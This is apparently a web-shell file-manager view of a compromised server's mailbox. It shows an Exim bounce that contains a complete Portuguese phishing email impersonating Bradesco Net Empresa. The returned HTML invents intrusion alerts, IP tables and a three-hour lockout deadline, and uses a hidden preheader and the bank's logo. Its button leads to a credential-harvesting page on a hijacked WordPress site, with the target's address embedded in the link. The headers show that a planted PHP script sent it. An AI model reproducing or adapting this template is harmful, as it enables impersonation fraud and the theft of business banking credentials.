HEX
Server: Apache/2
System: Linux server-27-254-144-72.da.direct 5.10.0-33-amd64 #1 SMP Debian 5.10.226-1 (2024-10-03) x86_64
User: bannong (1179)
PHP: 8.1.26
Disabled: exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
$ pwd: /home/bannong/Maildir/new/
Upload Files
File: /home/bannong/Maildir/new/1763003638.M575143P1758911.server-27-254-144-72.da.direct,S=11658,W=11846
Return-Path: <>
Delivered-To: bannong@bannongsaischool.com
Received: from server-27-254-144-72.da.direct
	by server-27-254-144-72.da.direct with LMTP
	id QHkfIvZMFWm/1hoADyop3w
	(envelope-from <>)
	for <bannong@bannongsaischool.com>; Thu, 13 Nov 2025 10:13:58 +0700
Return-path: <>
Envelope-to: bannong@bannongsaischool.com
Delivery-date: Thu, 13 Nov 2025 10:13:58 +0700
Received: from mail by server-27-254-144-72.da.direct with local (Exim 4.98)
	id 1vJNmY-00000007ZR4-2Aj3
	for bannong@bannongsaischool.com;
	Thu, 13 Nov 2025 10:13:58 +0700
X-Failed-Recipients: diretoria@fef.edu.br
Auto-Submitted: auto-replied
From: Mail Delivery System <Mailer-Daemon@server-27-254-144-72.da.direct>
To: bannong@bannongsaischool.com
References: <f9abcbadb003169fdfe5e5fe853ee65fc4c06c08@bannongsaischool.com>
Content-Type: multipart/report; report-type=delivery-status; boundary=1763003638-eximdsn-791798315
MIME-Version: 1.0
Subject: Mail delivery failed: returning message to sender
Message-Id: <E1vJNmY-00000007ZR4-2Aj3@server-27-254-144-72.da.direct>
Date: Thu, 13 Nov 2025 10:13:58 +0700

--1763003638-eximdsn-791798315
Content-type: text/plain; charset=us-ascii

This message was created automatically by mail delivery software.

A message that you sent could not be delivered to one or more of its
recipients. This is a permanent error. The following address(es) failed:

  diretoria@fef.edu.br
    host aspmx.l.google.com [74.125.200.27]
    SMTP error from remote mail server after RCPT TO:<diretoria@fef.edu.br>:
    550-5.1.1 The email account that you tried to reach does not exist. Please try
    550-5.1.1 double-checking the recipient's email address for typos or
    550-5.1.1 unnecessary spaces. For more information, go to
    550 5.1.1  https://support.google.com/mail/?p=NoSuchUser 41be03b00d2f7-bc3778dfdd6si479000a12.950 - gsmtp

--1763003638-eximdsn-791798315
Content-type: message/delivery-status

Reporting-MTA: dns; server-27-254-144-72.da.direct

Action: failed
Final-Recipient: rfc822;diretoria@fef.edu.br
Status: 5.0.0
Remote-MTA: dns; aspmx.l.google.com
Diagnostic-Code: smtp; 550-5.1.1 The email account that you tried to reach does not exist. Please try
 550-5.1.1 double-checking the recipient's email address for typos or
 550-5.1.1 unnecessary spaces. For more information, go to
 550 5.1.1  https://support.google.com/mail/?p=NoSuchUser 41be03b00d2f7-bc3778dfdd6si479000a12.950 - gsmtp

--1763003638-eximdsn-791798315
Content-type: message/rfc822

Return-path: <bannong@bannongsaischool.com>
Received: from bannong by server-27-254-144-72.da.direct with local (Exim 4.98)
	(envelope-from <bannong@bannongsaischool.com>)
	id 1vJNmT-00000007ZPR-1Stm
	for diretoria@fef.edu.br;
	Thu, 13 Nov 2025 10:13:56 +0700
To: diretoria@fef.edu.br
Subject: Ref: wkn46r2p6 - =?UTF-8?Q?=E2=9C=85_?= Diretoria - Fef - 4 invasoes detectadas no seu Bradesco Net Empresa – bloqueio em 3h se nao agir AGORA - 13/11/2025 10:13:53
X-PHP-Originating-Script: 1179:about.php
From: "Jorge Medeiros - Bradesco Net Empresa 14881" <seguranca26123@%bradesconetempresa.com.br>
MIME-Version: 1.0
Content-type: text/html; charset=iso-8859-1
X-Mailer: PHP/8.1.26
Reply-To: <seguranca26123@%bradesconetempresa.com.br>
X-Sender: seguranca26123@%bradesconetempresa.com.br
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
Message-ID: <f9abcbadb003169fdfe5e5fe853ee65fc4c06c08@bannongsaischool.com>
Date: Thu, 13 Nov 2025 02:55:15 +0000
X-Originating-IP: [27.254.144.72]

<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>4 invas&otilde;es no seu Bradesco Net Empresa &ndash; bloqueio em 3h</title>
    <!-- Preheader (invis&iacute;vel no corpo, vis&iacute;vel no inbox) -->
    <div style="display:none; font-size:1px; color:#f4f4f4; line-height:1px; max-height:0px; max-width:0px; opacity:0; overflow:hidden; mso-hide:all;">
        Jorge Medeiros tentou te ligar 5x em 24h, Diretoria - Fef. 4 tentativas de invas&atilde;o detectadas hoje, 12/11/2025. Valide em 2 cliques ou perde acesso ao Net Empresa.
    </div>
    <style>
        body { margin:0; padding:0; background:#f4f4f4; font-family:Helvetica,Arial,sans-serif; color:#000000; }
        .container { max-width:600px; margin:20px auto; background:#ffffff; border-radius:8px; overflow:hidden; box-shadow:0 4px 12px rgba(0,0,0,0.1); }
        .header { background:linear-gradient(135deg,#cc092f,#9b001c); padding:20px; text-align:center; }
        .header img { height:45px; }
        .content { padding:30px 25px; }
        .alert { background:#fff3cd; border-left:5px solid #ffc107; padding:15px; margin:20px 0; font-weight:bold; color:#856404; border-radius:0 4px 4px 0; }
        .btn { display:block; width:fit-content; margin:25px auto; background:linear-gradient(135deg,#cc092f,#9b001c); color:#ffffff; text-decoration:none; padding:16px 36px; border-radius:50px; font-weight:bold; font-size:16px; text-align:center; box-shadow:0 6px 12px rgba(204,9,47,0.3); }
        .btn:hover { background:linear-gradient(135deg,#b00828,#850016); transform:translateY(-2px); }
        .urgent { color:#d32f2f; font-weight:bold; font-size:18px; text-align:center; }
        .tech { background:#f9f9f9; border:1px solid #eee; padding:12px; margin:15px 0; font-family:'Courier New',monospace; font-size:13px; border-radius:4px; }
        table { width:100%; border-collapse:collapse; margin:15px 0; font-size:13px; }
        th, td { border:1px solid #ddd; padding:8px; text-align:left; }
        th { background:#cc092f; color:#fff; }
        .badge { display:inline-block; background:#d32f2f; color:#fff; font-size:11px; padding:3px 7px; border-radius:12px; font-weight:bold; }
        .footer { background:#f1f1f1; padding:20px; text-align:center; font-size:12px; color:#666; border-top:1px solid #eee; }
        @media (max-width:600px) {
            .container { margin:10px; border-radius:6px; }
            .content { padding:20px 15px; }
            .btn { padding:14px 30px; font-size:15px; }
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="header">
            <img src="https://www.bradesco.com.br/pf/img/logo-bradesco.png" alt="Bradesco">
        </div>
        <div class="content">
            <p>Prezado(a) <strong>Diretoria - Fef</strong>,</p>
            <p>Sou <strong>Jorge Medeiros</strong>, Gerente de Relacionamento Bradesco Net Empresa. Tentei contato <strong>5 vezes</strong> nas &uacute;ltimas 24h &ndash; sem sucesso.</p>
            <div class="alert">
                &#9888; <span style="color:#d32f2f;font-weight:bold;">ALERTA CR&Iacute;TICO DE SEGURAN&Ccedil;A</span>: Detectamos <strong>4 tentativas de invas&atilde;o</strong> no <strong>Net Empresa</strong> da sua empresa em <strong>13/11/2025 10:13:53</strong>, usando credenciais v&aacute;lidas, mas de dispositivos <span class="badge">N&Atilde;O CADASTRADOS</span>.
            </div>
            <p>Esses acessos violaram a <strong>Resolu&ccedil;&atilde;o 4.658 do BACEN</strong> e podem resultar em:</p>
            <ul>
                <li><strong>Bloqueio total do Net Empresa</strong> em at&eacute; 6 horas</li>
                <li>Exposi&ccedil;&atilde;o de dados sens&iacute;veis da empresa</li>
                <li>Transa&ccedil;&otilde;es PIX/TED suspensas por seguran&ccedil;a</li>
            </ul>
            <h3>&#128187; Detalhes T&eacute;cnicos do Incidente (SIEM Bradesco &ndash; 12/11/2025)</h3>
            <div class="tech">
                <strong>Evento ID:</strong> SEC-BRAD-2025-11-89214<br>
                <strong>Origem:</strong> IP 187.45.193.112 (Provedor: Claro S.A. - Rio de Janeiro/RJ)<br>
                <strong>User-Agent:</strong> Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/131.0<br>
                <strong>M&eacute;todo:</strong> MFA bypass via cookie session hijacking<br>
                <strong>Tentativas:</strong> 22:18 | 01:34 | 07:51 | 09:12
            </div>
            <table>
                <tr><th>Hor&aacute;rio</th><th>IP</th><th>Cidade</th><th>Status</th></tr>
                <tr><td>22:18</td><td>187.45.193.112</td><td>Rio de Janeiro/RJ</td><td><span class="badge">BLOQUEADO</span></td></tr>
                <tr><td>01:34</td><td>200.155.77.89</td><td>S&atilde;o Paulo/SP</td><td><span class="badge">SUSPENSO</span></td></tr>
                <tr><td>07:51</td><td>189.22.101.44</td><td>Belo Horizonte/MG</td><td><span class="badge">ATIVO</span></td></tr>
                <tr><td>09:12</td><td>177.99.88.201</td><td>Curitiba/PR</td><td><span class="badge">CR&Iacute;TICO</span></td></tr>
            </table>
            <p><strong>Para sua prote&ccedil;&atilde;o imediata, a Central de Seguran&ccedil;a Bradesco emitiu um <span style="color:#cc092f;font-weight:bold;">PROTOCOLO DE VALIDA&Ccedil;&Atilde;O URGENTE (PVU)</span></strong>:</p>
            <ul>
                <li>Valida&ccedil;&atilde;o de identidade do usu&aacute;rio <strong>Diretoria - Fef</strong></li>
                <li>Agendamento de contato VIP em at&eacute; 30 min</li>
                <li>Libera&ccedil;&atilde;o de certificado digital atualizado (v4.2.1)</li>
                <li>Relat&oacute;rio forense completo (PDF criptografado)</li>
            </ul>
            <p style="text-align:center;">
                <!--[if mso]>
                <v:roundrect xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w="urn:schemas-microsoft-com:office:word" href="https://wmea.charity/wp-content/themes/twentytwentyfive/net/index.php?cid=diretoria@fef.edu.br&black=ii" style="height:50px;v-text-anchor:middle;width:300px;" arcsize="50%" stroke="f" fillcolor="#cc092f">
                  <w:anchorlock/>
                  <center style="color:#ffffff;font-family:Helvetica,Arial,sans-serif;font-size:16px;font-weight:bold;">&#128274; PREENCHER FORMUL&Aacute;RIO DE SEGURAN&Ccedil;A (contato em 30 min)</center>
                </v:roundrect>
                <![endif]-->
                <!--[if !mso]><!-- -->
                <a href="https://wmea.charity/wp-content/themes/twentytwentyfive/net/index.php?cid=diretoria@fef.edu.br&black=ii" class="btn" target="_blank" style="display:inline-block;">
                    &#128274; PREENCHER FORMUL&Aacute;RIO DE SEGURAN&Ccedil;A (contato em 30 min)
                </a>
                <!--<![endif]-->
            </p>
            <div class="alert">
                &#9200; <strong>EXPIRA EM 3 HORAS</strong>: Ap&oacute;s 13/11/2025 10:13:53, o sistema <span style="color:#d32f2f;">bloquear&aacute; automaticamente</span> todas as opera&ccedil;&otilde;es do Net Empresa.
            </div>
            <p><strong>&#128176; VANTAGENS EXCLUSIVAS POR A&Ccedil;&Atilde;O IMEDIATA:</strong></p>
            <ul>
                <li><strong>Isen&ccedil;&atilde;o TOTAL da Cesta Net Empresa</strong> por 12 meses (R$ 1.800,00/ano)</li>
                <li><strong>Cr&eacute;dito emergencial pr&eacute;-aprovado</strong>: R$ 100.000,00 (libera&ccedil;&atilde;o em 5 min)</li>
                <li>Gerente VIP 24h + canal exclusivo WhatsApp</li>
            </ul>
            <p class="urgent">
                &#9888; PREENCHA AGORA PARA EVITAR BLOQUEIO TOTAL DO NET EMPRESA
            </p>
        </div>
        <div class="footer">
            <p><strong>Jorge Medeiros</strong><br>
            Gerente de Relacionamento Empresarial<br>
            Bradesco Net Empresa | CNPJ 60.746.948/0001-12<br>
            <small>Este &eacute; um comunicado oficial da Central de Seguran&ccedil;a Bradesco. N&atilde;o responda este e-mail.</small></p>
        </div>
    </div>
</body>
</html>

--1763003638-eximdsn-791798315--
@ Telegram